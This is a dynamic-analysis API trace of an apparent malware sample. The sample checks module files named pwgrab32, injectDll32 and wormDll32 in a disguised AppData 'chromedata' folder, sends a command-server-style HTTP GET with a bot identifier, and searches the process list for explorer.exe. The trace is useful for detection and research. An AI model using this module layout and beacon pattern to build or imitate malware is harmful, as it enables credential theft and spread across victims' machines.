	[0243.334] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2737e30, Size=0x20) returned 0x2737f20
	[0243.334] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x271f00
	[0243.334] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 1
	[0243.334] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2737f20, Size=0x20) returned 0x2737e30
	[0243.334] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26e438
	[0243.334] FindNextFileW (in: hFindFile=0x22b6a40, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 0
	[0243.334] GetLastError () returned 0x12
	[0243.334] FindClose (in: hFindFile=0x22b6a40 | out: hFindFile=0x22b6a40) returned 1
	[0243.335] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0243.335] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0243.335] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0243.335] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0243.335] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0243.335] CloseHandle (hObject=0x6e4) returned 1
	[0243.335] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x78bdb780, dwHighDateTime=0x1d50a6a)) 
	[0243.335] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0243.335] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0243.335] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0243.335] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0243.335] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0243.335] CloseHandle (hObject=0x6e4) returned 1
	[0243.335] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x78bdb780, dwHighDateTime=0x1d50a6a)) 
	[0243.335] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0243.336] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0243.336] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0243.336] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0243.336] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0243.336] CloseHandle (hObject=0x6e4) returned 1
	[0243.336] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x78bdb780, dwHighDateTime=0x1d50a6a)) 
	[0243.336] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0243.336] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0243.336] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0243.336] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0243.336] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0243.336] CloseHandle (hObject=0x6e4) returned 1
	[0243.336] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x78bdb780, dwHighDateTime=0x1d50a6a)) 
	[0243.336] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0243.336] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0243.336] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
	[0243.336] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0243.337] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0243.337] CloseHandle (hObject=0x6e4) returned 1
	[0243.337] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x78bdb780, dwHighDateTime=0x1d50a6a)) 
	[0243.337] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0243.337] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0243.337] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0243.337] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0243.337] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0243.337] CloseHandle (hObject=0x6e4) returned 1
	[0243.337] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x78bdb780, dwHighDateTime=0x1d50a6a)) 
	[0243.338] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32") returned="wormDll32"
	[0243.338] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0243.338] GetFullPathNameW (in: lpFileName="Data\\wormDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32", lpFilePart=0x0) returned 0x3f
	[0243.338] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\wormdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6e4
	[0243.338] GetFileTime (in: hFile=0x6e4, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a)) returned 1
	[0243.338] CloseHandle (hObject=0x6e4) returned 1
	[0243.338] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x78bdb780, dwHighDateTime=0x1d50a6a)) 
	[0243.338] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0243.338] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0243.338] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/g0Kh2Pj1Ol2IeuDVnAWn8UqBS/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0243.338] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0243.338] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0243.987] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
	[0243.987] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0243.987] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x3) returned 1
	[0243.987] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff948
	[0243.988] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x22ff948, dwNumberOfBytesToRead=0x3, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x22ff948*, lpdwNumberOfBytesRead=0x128bdc*=0x3) returned 1
	[0243.988] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0243.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ff948, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3
	[0243.988] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe10
	[0243.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ff948, cbMultiByte=3, lpWideCharStr=0x22ffe10, cchWideChar=3 | out: lpWideCharStr="/1/") returned 3
	[0243.988] StrStrIW (lpFirst="/1/", lpSrch="/") returned="/1/"
	[0243.988] StrStrIW (lpFirst="1/", lpSrch="/") returned="/"
	[0243.989] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0243.989] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe58
	[0243.989] lstrcpynW (in: lpString1=0x22ffe58, lpString2="1/", iMaxLength=2 | out: lpString1="1") returned="1"
	[0243.989] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff660) returned 1
	[0243.989] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe10) returned 1
	[0243.989] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0243.989] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff948) returned 1
	[0243.989] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x264
	[0243.992] Process32FirstW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0243.993] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0243.993] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0243.995] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0243.995] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0243.996] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0243.996] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0243.997] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0243.997] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0243.998] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0243.998] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0243.999] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0243.999] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0244.001] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0244.001] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0244.002] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0244.002] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0244.003] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0244.003] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0244.003] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0244.004] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.004] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.004] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.005] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.005] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.006] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.006] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.007] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.007] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.008] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.008] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.009] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.009] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.010] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.010] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0244.011] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0244.011] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.011] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.011] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0244.012] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0244.012] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0244.013] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0244.013] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.014] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.014] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0244.015] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0244.015] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0244.016] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0244.016] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0244.017] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0244.017] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0244.018] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0244.018] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0244.019] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
